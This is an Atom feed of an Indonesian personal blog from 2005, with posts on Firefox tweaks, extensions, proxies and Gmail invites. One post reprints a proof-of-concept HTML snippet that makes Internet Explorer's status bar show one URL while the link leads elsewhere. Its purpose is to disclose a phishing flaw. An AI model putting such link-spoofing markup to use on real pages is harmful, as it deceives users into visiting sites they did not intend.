<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-10455602</id><updated>2011-11-17T22:21:21.881+08:00</updated><title type='text'>.:: ZONE - D ::.</title><subtitle type='html'>Zone-D, adalah blog yang berisikan apa yang ingin diisikan oleh seseorang yang bernama D. Jadi isinya gak tentu itu-itu saja tergantung suasana di D. Cuma yang jelas satu "Semoga Ada Manfaatnya" dan semua perbuatan yang dilakukan karena membaca Zone-D ini, diluar tanggung jawab "D".</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>13</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-10455602.post-110989786123765774</id><published>2005-03-04T08:50:00.000+08:00</published><updated>2005-03-04T15:00:10.246+08:00</updated><title type='text'>Utak Atik Browser Firefox</title><content type='html'>&lt;div style="text-align: justify;"&gt;Posting kali ini, idenya dari si &lt;a href="http://thestoopid.tk/" target="_blank"&gt;Adi&lt;/a&gt;, yang dengan rasa terima kasih, saya diberitahu buat nge-hack Firefox...&lt;br /&gt;Setelah saya gole'i neng mas bos google, akhire ketemu juga.&lt;br /&gt;Berikut hasil tulisan temen kita yang bernama &lt;a href="http://www.i-hacked.com/content/view/59/42/" target="_blank"&gt;hevnsnt&lt;/a&gt;  trus saya coba meng-Indonesia-kannya, mohon maklum kalo rada ngawur...&lt;br /&gt;&lt;br /&gt;Ok, &lt;a href="http://www.spreadfirefox.com/?q=affiliates&amp;id=78242&amp;amp;t=1" target="_blank"&gt;Firefox &lt;/a&gt;adalah browser favorit ku, jika kamu ngga nggunainnya ( misal hanya nggunain... Gasp, I.E) kamu perlu perubahan. Baiklah Aku memutuskan untuk menulis suatu artikel tentang bagaimana caranya "nge-Hack" Firefox agar menjadi lebih baik. "nge-Tweak" disana-sini, kita buat Firefox menjadi lebih cepat, sehingga memungkinkan untuk "advanced tab option" , juga membuatnya agar versi baru kompatibel dengan older extentions, bisa secara langsung dengan "Flash Disk", dan lain-lain.&lt;br /&gt;&lt;br /&gt;Pertama², Mari kita ubah pada bagian "option" yang tersembunyi agar membuatnya lebih cepat&lt;br /&gt;1. Buka Firefox 1.0 dan pada "&lt;span style="font-weight: bold;"&gt;address bar&lt;/span&gt;" ketikan: "&lt;span style="font-weight: bold;"&gt;about:config&lt;/span&gt;" , lalu di-enter atau klik tombol "GO".&lt;br /&gt;2. Ketikan "&lt;span style="font-weight: bold;"&gt;browser.tabs.showSingleWindowModePrefs&lt;/span&gt;" pada "&lt;span style="font-weight: bold;"&gt;filter bar&lt;/span&gt;" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian &lt;span style="font-style: italic;"&gt;preference name&lt;/span&gt; ada nongol dengan value "&lt;span style="font-weight: bold;"&gt;false&lt;/span&gt;", nah lalu "di-klik 2 kali "browser.tabs.showSingleWindowModePrefs", dan value akan berubah jadi "&lt;span style="font-weight: bold;"&gt;true&lt;/span&gt;"&lt;br /&gt;3. Ketikan "&lt;span style="font-weight: bold;"&gt;network.http.pipelining&lt;/span&gt;" pada "&lt;span style="font-weight: bold;"&gt;filter bar&lt;/span&gt;" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian &lt;span style="font-style: italic;"&gt;preference name&lt;/span&gt; ada nongol dengan value "&lt;span style="font-weight: bold;"&gt;false&lt;/span&gt;", nah lalu "di-klik 2 kali "network.http.pipelining", dan value akan berubah jadi "&lt;span style="font-weight: bold;"&gt;true&lt;/span&gt;"&lt;br /&gt;4. Ketikan "&lt;span style="font-weight: bold;"&gt;network.http.pipelining.maxrequests&lt;/span&gt;" pada "filter bar" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian &lt;span style="font-style: italic;"&gt;preference name&lt;/span&gt; ada nongol dengan value "&lt;span style="font-weight: bold;"&gt;4&lt;/span&gt;", nah lalu "di-klik 2 kali " network.http.pipelining.maxrequests", dan ubah value menjadi "&lt;span style="font-weight: bold;"&gt;100&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Apa yang berubah ??&lt;/span&gt;&lt;br /&gt;1. Memungkinkan "advanced tab option" pada "Tools/Options page" browser anda.&lt;br /&gt;2. Memungkinkan "option" # 3.&lt;br /&gt;3. Membuat Firefox menggunakan 8 "thread" di tiap page. Pokoknya Firefox anda akan lebih cepat dari sebelumnya.&lt;br /&gt;&lt;br /&gt;Ke dua, mari kita buat menjadi lebih baik lagi..&lt;br /&gt;Kunjungi "&lt;a href="https://update.mozilla.org/themes/?application=%7Bec8030f7-c20a-464f-9b0e-13a3a9e97384%7D" target="_blank"&gt;Theme Page&lt;/a&gt;" Mozilla Firefox dan pilih salah satu "theme".&lt;br /&gt;Aku make Noia eXtreme skin.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://www.i-hacked.com/images/stories/Noia_2_0_eXtreme_For_Firefox_by_Kasteo.png.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt; Sekarang biarkan perbuatan "tweak" kita tadi bekerja...&lt;br /&gt;Salah satu yang paling menarik dari Firefox adalah kemampuannya dalam penggunaan &lt;a href="http://texturizer.net/firefox/extensions/" target="_blank"&gt;extentions&lt;/a&gt;. Pada saat penulisan artikel ini, ada 226 extentions yang dapat kita gunakan untuk membuatnya lebih baik.. Aku hanya akan menyinggung beberapa di antaranya.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=10&amp;amp;vid=664" target="_blank"&gt;Adblock&lt;/a&gt;: Memblok iklan&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=14&amp;amp;vid=1187" target="_blank"&gt;Bookmarks Synchronizer&lt;/a&gt;: nge-save bookmark anda ke file XML, dan sync dengan suatu FTP server.&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/clav/#digger" target="_blank"&gt;Digger&lt;/a&gt;: Navigasi ke parent direktori, tombol ke ftp padanan lokasi, hingga ke subdomain, dll. Sangat membantu saat "Scouting" suatu situs.&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/more-info.php/downsort" target="_blank"&gt;Download Sort&lt;/a&gt;;Jenis: Otomatis menaro file download-an ke folder atau direktori yang kita inginkan.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=173&amp;amp;vid=504" target="_blank"&gt;Gmail Notifier&lt;/a&gt;:: Memberitahukan pada kamu, jika kamu mendapatkan email baru (asal kamu punya email di Gmail)&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=262&amp;amp;vid=1194" target="_blank"&gt;Google Pagerank Status&lt;/a&gt;: Memperlihatkan Google Pagerank dari  halaman yang sedang kamu kunjungi.&lt;br /&gt;&lt;a href="http://refspoof.mozdev.org/index.html" target="_top"&gt;refspoof&lt;/a&gt;: "Spoof" your referrer (saya gak tau artinya kekekek).&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/more-info.php/spiderzilla" target="_blank"&gt;Spiderzilla&lt;/a&gt;: Untuk ngedownload satu halaman penuh di direktori lokal.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?id=137" target="_blank"&gt;Super DragAndGo&lt;/a&gt;: Drag suatu link ke halaman kosong, maka akan terbuka satu "Tab" baru.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=125&amp;amp;vid=1144" target="_blank"&gt;SwitchProxy&lt;/a&gt;:: Mengatur beberapa proxy.&lt;br /&gt;&lt;a href="https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=59&amp;amp;vid=617" target="_blank"&gt;User Agent Switcher&lt;/a&gt;: nge-switch user agent browser kamu.&lt;br /&gt;&lt;a href="http://extensionroom.mozdev.org/more-info.php/x" target="_blank"&gt;x&lt;/a&gt;: Adalah tombol Toolbar "Paranoia", tinggal di-klik dan akan menghapus segala "History", "Form Info", password yang ter-save, history downloadan, cookies dan cache.&lt;br /&gt;&lt;br /&gt;Beritahu Firefox apa yang kita inginkan atau apa yang tidak kita inginkan...&lt;br /&gt;Bosan dengan iklan Goggle ? Mari kita utak-atik Firefox, agar tidak menampilkan iklan-iklan tersebut..(yaaa termasuk dari Gmail). Hati² dengan memindahkan iklan ini, kita udah melanggar aturan email Gmail.&lt;br /&gt;Caranya adalah dengan mengubah file CSS yang pada Firefox bernama UserContent.CSS.&lt;br /&gt;Kita lakukan edit pada file CSS tersebut, saya sarankan kamu nge-download dulu Plugin "&lt;a href="http://texturizer.net/firefox/extensions/#chromedit" target="_blank"&gt;ChomEdit&lt;/a&gt;" untuk mempermudah pekerjaan ini. Install plugin tersebut lalu browser Firefox di restart kembali.&lt;br /&gt;Pada browser Firefox kliklah pada tab "Tools/Edit User Files, maka jendela baru akan terbuka dengan 5 tab di bagian atasnya. Klik pada tab yang bertuliskan "UserContent.CSS". Lalu klik pada link dibawahnya dan copy-kan semuanya, lalu paste-kan ke file Usercontent.CSS lalu di Save....udah deh kelarrrr.&lt;br /&gt;Ini kode untuk CSS-nya &lt;a href="http://www.i-hacked.com/freefiles/removeads.txt" target="_blank"&gt;Code&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Taraaa iklan Gogglenya ilang .......&lt;br /&gt;Nah... sekian postingan daku....&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110989786123765774?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.i-hacked.com/content/view/59/42/' title='Utak Atik Browser Firefox'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110989786123765774/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110989786123765774' title='55 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110989786123765774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110989786123765774'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/03/utak-atik-browser-firefox.html' title='Utak Atik Browser Firefox'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>55</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110972248283954956</id><published>2005-03-02T08:07:00.000+08:00</published><updated>2005-03-02T09:41:46.683+08:00</updated><title type='text'>Firefox browser teraman ???</title><content type='html'>Sekarang gw baru tau, kalo browser pesaing terberat I.E adalah browser keluaran Mozzila yakni : &lt;a href="http://www.spreadfirefox.com/?q=affiliates&amp;amp;id=78242&amp;amp;t=1" target="_blank"&gt;Firefox&lt;/a&gt;.&lt;br /&gt;Kata para netter sih, browser ini paling aman dan kayanya I.E bakalan tergusurrrrr....&lt;br /&gt;Menurut pengalaman sih, kalo suatu software yang laku keras biasanya...ujung²nya, gak gratis.., misalnya : kaya httrack yang udah gak gratisan lagi di &lt;a href="http://httrack.com/" target="_blank"&gt;httrack.com&lt;/a&gt; . Padahal program itu bagus banget buat ngambil informasi satu website penuh.&lt;br /&gt;Makanya mumpung masih gratis, cepetan download browser ini : &lt;a href="http://www.spreadfirefox.com/?q=affiliates&amp;amp;id=78242&amp;amp;t=1" target="_blank"&gt;Firefox&lt;br /&gt;&lt;/a&gt;mumpung gratis, dan mungkin bagi netter yang udah mulai bosan make I.E,.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110972248283954956?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.spreadfirefox.com/?q=affiliates&amp;amp;id=78242&amp;amp;t=1' title='Firefox browser teraman ???'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110972248283954956/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110972248283954956' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110972248283954956'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110972248283954956'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/03/firefox-browser-teraman.html' title='Firefox browser teraman ???'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110956608315671473</id><published>2005-02-28T12:35:00.000+08:00</published><updated>2005-02-28T12:48:03.156+08:00</updated><title type='text'>Leiotku...</title><content type='html'>Liat-liat blog orang...., ada yg leiotnya bagus, isinya bagus, gw jadi bingung sendiri, sebenernya bagus itu harus milih salah satunya gak yah,&lt;br /&gt;waktu bikin blog ini, sempet gak pengen leiot yg bagus² amat, *bathin* gw sih bilang yg penting isinya......, trus sekarang *bathin* gw bilang "mending leiotnya juga bagus*..... eh malah isi blog gw sekarang gak terlalu bagus juga kakakakakkk....&lt;br /&gt;Gara-garanya pengen punya leiot blog bagus, pas ngeliat situs &lt;a href="http://cssvault.com/"&gt;CSSVAULT&lt;/a&gt;&lt;a&gt; sama &lt;/a&gt;&lt;a href="http://www.cssbeauty.com/"&gt;CSSBEAUTY&lt;/a&gt;   *ckckckck*&lt;br /&gt;Mungkin suatu hari, leiot ini akan gw ubah juga kali...&lt;br /&gt;Yang jelas lagi pengen punya blog yg 3 column... ntah kenapa..&lt;br /&gt;Hmmm... tapi biasanya, kalo blog bagus itu suka make gambar² yg banyak, dan itu bikin lama baru tampil, dilema ini bisa dipecahin gak yah ???&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110956608315671473?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110956608315671473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110956608315671473' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110956608315671473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110956608315671473'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/leiotku.html' title='Leiotku...'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110870490292399610</id><published>2005-02-18T13:16:00.000+08:00</published><updated>2005-02-18T13:35:02.926+08:00</updated><title type='text'>Phishing hole found in IE and OE</title><content type='html'>&lt;div align="justify"&gt;Another major vulnerability has been found in Microsoft's Internet Explorer and OutlookExpress. The flaw is in the way that these applications can be manipulatedin simple HTML code to display an URL other than the one specified in a link, tobe displayed in the status bar.&lt;br /&gt;The status bar is the first place users look, or at least should look when followingany link in an email or on a website to ensure that the link is taking them towhere it says it is. HTML that utilizes this vulnerability can change what isdisplayed in the status bar of these applications, thus leading to a possible majorphishing hole that can be used in very serious ways.&lt;br /&gt;Proof of concept code has been released and a description of how the flaw is utilizedhas been published. Below is an example of the flaw, and if you are using InternetExplorer to view this page, then in the status bar, you will see eBay.com,however if you are using Firefox, then you will see spreadfirefox.com. If youclick on the link in Internet Explorer you will be directed to spreadfirefox.com,however in Firefox, you will go to eBay.com.&lt;br /&gt;Here is the code:&lt;/div&gt;&lt;div align="justify"&gt;&lt;/div&gt;&lt;p align="justify"&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;a id="SPOOF" href="http://spreadfirefox.com"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;div&amp;gt;&lt;br /&gt;&amp;lt;a href="http://ebay.com" target="_blank"&amp;gt;&lt;br /&gt;&amp;lt;table&amp;gt;&lt;br /&gt;&amp;lt;caption&amp;gt;&lt;br /&gt;&amp;lt;a href="http://ebay.com" target="_blank"&amp;gt;&lt;br /&gt;&amp;lt;label for="SPOOF"&amp;gt;&lt;br /&gt;&amp;lt;u style="cursor: pointer; color: blue"&amp;gt;&lt;br /&gt;ebay.com&lt;br /&gt;&amp;lt;/u&amp;gt;&lt;br /&gt;&amp;lt;/label&amp;gt;&lt;br /&gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&amp;lt;/caption&amp;gt;&lt;br /&gt;&amp;lt;/table&amp;gt;&lt;br /&gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt; &lt;/p&gt;&lt;p align="justify"&gt;&lt;br /&gt;      An example and this article can be seen at: &lt;a href="http://habaneronetworks.com/viewArticle.php?ID=140"&gt;http://habaneronetworks.com/viewArticle.php?ID=140&lt;/a&gt; &amp; &lt;a href="http://www.securityfocus.com/archive/1/390784"&gt;http://www.securityfocus.com/archive/1/390784&lt;/a&gt; If you did use Internet Explorer to open the link, then maybe you should read aboutFirefox here, and consider switching. Mozilla also has a beautiful product toreplace Outlook Express too.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110870490292399610?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://habaneronetworks.com/viewArticle.php?ID=140' title='Phishing hole found in IE and OE'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110870490292399610/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110870490292399610' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110870490292399610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110870490292399610'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/phishing-hole-found-in-ie-and-oe_18.html' title='Phishing hole found in IE and OE'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110844238947146328</id><published>2005-02-15T12:37:00.000+08:00</published><updated>2005-02-15T12:39:49.473+08:00</updated><title type='text'>Valentine's Day: Everyone's having sex today but YOU</title><content type='html'>&lt;div align="justify"&gt;It's Valentine's Day. Half of the country will be f--king like wild billy-goats. The other half will just be f--king bitter. The good folks at Durex have something for both camps. The former can indulge in the contraceptive concern's wide range of STD- and pregnancy-busting prophylactics. And for the latter, nothing less than an international-sized reminder of how much play they're missing out on. Durex, a subsidiary of London-based SSL International, recently released their annual survey of sexual behavior around the world. The "Global Sex Survey," now in its eighth year, polled more than 350,000 people from 41 countries, and is billed as the largest such study around. Among the 16 questions, the following six stood out to me (I only listed results for first place, Canada, global average, India, U.K., U.S. and last place)... &lt;blockquote&gt;waw...ckckckc&lt;/blockquote&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110844238947146328?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://boingboing.net/' title='Valentine&apos;s Day: Everyone&apos;s having sex today but YOU'/><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110844238947146328/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110844238947146328' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110844238947146328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110844238947146328'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/valentines-day-everyones-having-sex.html' title='Valentine&apos;s Day: Everyone&apos;s having sex today but YOU'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110834997706046169</id><published>2005-02-14T10:21:00.000+08:00</published><updated>2005-02-14T10:59:37.063+08:00</updated><title type='text'>Wanna be hacker or Wanna be invisible ?</title><content type='html'>&lt;div align="justify"&gt;Gak nyangka, ternyata ada yg mo mampir ke situs gw ini...&lt;br /&gt;oh iya buat temen² yg pengen belajar nge-hack, bisa buka situs &lt;a href="http://hackthissite.org"&gt;http://hackthissite.org&lt;/a&gt; , tapi kudu register dulu, asik juga buat iseng-iseng, kalo pengen cepet naik level bisa buka tutorialnya di &lt;a href="http://johnny.ihackstuff.com"&gt;http://johnny.ihackstuff.com&lt;/a&gt; cari bagian download dan kudu register juga, tapi (lagi) perlu di modif sedikit soalnya server game itu dah pindah.&lt;/div&gt;&lt;div align="justify"&gt;Hmm..., ada lagi yang baru saya baca, soal proxy, ternyata selain kita bisa ngerubahnya di browser, kita bisa juga lewat web yah ... (kikikikik...ternyata gw masih gatek total..), temen² yg pengen surfing "rahasia" bisa lewat link yg disediakan di site  &lt;a href="http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm"&gt;http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm&lt;/a&gt; ini, atau langsung ke &lt;a href="http://anonymouse.ws/"&gt;http://anonymouse.ws/&lt;/a&gt; , dengan lewat site itu, kita bisa gak ketahuan abis buka situs yang kita ingin gak diketahui oleh orang yang pengen liat history kita.&lt;/div&gt;&lt;div align="justify"&gt;Hmm maaf, bagi yang sudah tau, mungkin info ini juga basi, tapi mungkin berguna bagi yang belum mengetahuinya. (hehehehe...)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110834997706046169?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110834997706046169/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110834997706046169' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110834997706046169'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110834997706046169'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/wanna-be-hacker-or-wanna-be-invisible.html' title='Wanna be hacker or Wanna be invisible ?'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110758261571622379</id><published>2005-02-05T13:24:00.000+08:00</published><updated>2005-02-18T13:40:08.906+08:00</updated><title type='text'>Kegiatan Hari Ini</title><content type='html'>&lt;div align="justify"&gt;Seperti biasa, gw tetap gak punya banyak pekerjaan dikantor, akhirnya hobi browsing trus tersalurkan (xixixi...), cuman sempet bingung, saking banyaknya web site yg dibuka, gak tau lagi pengen baca apa lagi..... oh iya sempet bego juga, karena baru tadi gw ngarti apa itu RSS, (wakakakaka....), gw nyarinya: [ &lt;a href="http://www.google.co.id/search?num=100&amp;hl=id&amp;amp;q=rss&amp;btnG=Mesin+Cari+Google&amp;amp;meta=cr=countryID"&gt;.:: klik disini ::.&lt;/a&gt; ]&lt;br /&gt;ra popo toh daripada gak tau sama sekali..... :p&lt;br /&gt;trus soal web site [ &lt;a href="http://binaraga.info"&gt;http://binaraga.info&lt;/a&gt; ] , gw heran hari gini, kok untuk informasi kesehatan kok, kudu bayar toh.., hmmmm *empet*, tapi sebelum site itu mereka jadiin kaya gitu, dulu dah pernah gw download satu websitenya (xixixix...)..... {ngedownloadnya make httrack bisa diambil di [ &lt;a href="http://www.httrack.com"&gt;http://www.httrack.com&lt;/a&gt; ]}, isinya bagus banget, kebetulan gw lagi giat²nya ngebentuk body :)&lt;br /&gt;Jadi yg gw browse hari ini : [ &lt;a href="http://zone-h.org"&gt;http://zone-h.org&lt;/a&gt; ], [ &lt;a href="http://www.jasakom.com/Artikel.asp?ID=575"&gt;http://www.jasakom.com/Artikel.asp?ID=575&lt;/a&gt; ] hmmm udah... sempet mampir lama di [ &lt;a href="http://angkringan.or.id"&gt;http://angkringan.or.id&lt;/a&gt; ]&lt;br /&gt;........... have a nice weekend..?!?! &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110758261571622379?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110758261571622379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110758261571622379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110758261571622379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110758261571622379'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/kegiatan-hari-ini.html' title='Kegiatan Hari Ini'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110732687746839738</id><published>2005-02-02T14:38:00.000+08:00</published><updated>2005-02-02T14:47:57.466+08:00</updated><title type='text'>Tips Bikin Email Di Gmail</title><content type='html'>Ada yg pengen punya email di gmail.com, tapi belum bisa ngedaftar....mungkin ini ada sedikit solusi, tapi maaf kalo tulisan ini rada basi..:), gw cuman berbagi buat yg belum tau aja :P.kalo gak salah sih, gmail masih menutup registernya, kecuali di invite..nah soal invite gmail ada solusinya dari mas johnny long, dan dimodif dikit :)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://groups-beta.google.com/groups?as_q=allintext%3A+gmail&amp;num=10&amp;amp;scoring=r&amp;hl=en&amp;amp;ie=UTF-8&amp;as_epq=intext%3Ahttp+intext%3Agmail+intext%3Agoogle+intext%3Acom+intext%3Agmail+intext%3Aa&amp;amp;as_oq=invite+invit%C3%A9&amp;as_eq=&amp;amp;as_ugroup=&amp;as_usubject=&amp;amp;as_uauthors=&amp;lr=&amp;amp;as_drrb=q&amp;as_qdr=d&amp;amp;as_mind=1&amp;as_minm=1&amp;amp;as_miny=2005&amp;as_maxd=1&amp;amp;as_maxm=2&amp;as_maxy=2005&amp;amp;safe=off"&gt;.:: klik ajah ::.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Setelah kebuka semuanya : Liat tanggal dan jam posting invitenya, ambil yang terbaru biar gak expired..... :)&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110732687746839738?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110732687746839738/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110732687746839738' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110732687746839738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110732687746839738'/><link rel='alternate' type='text/html' 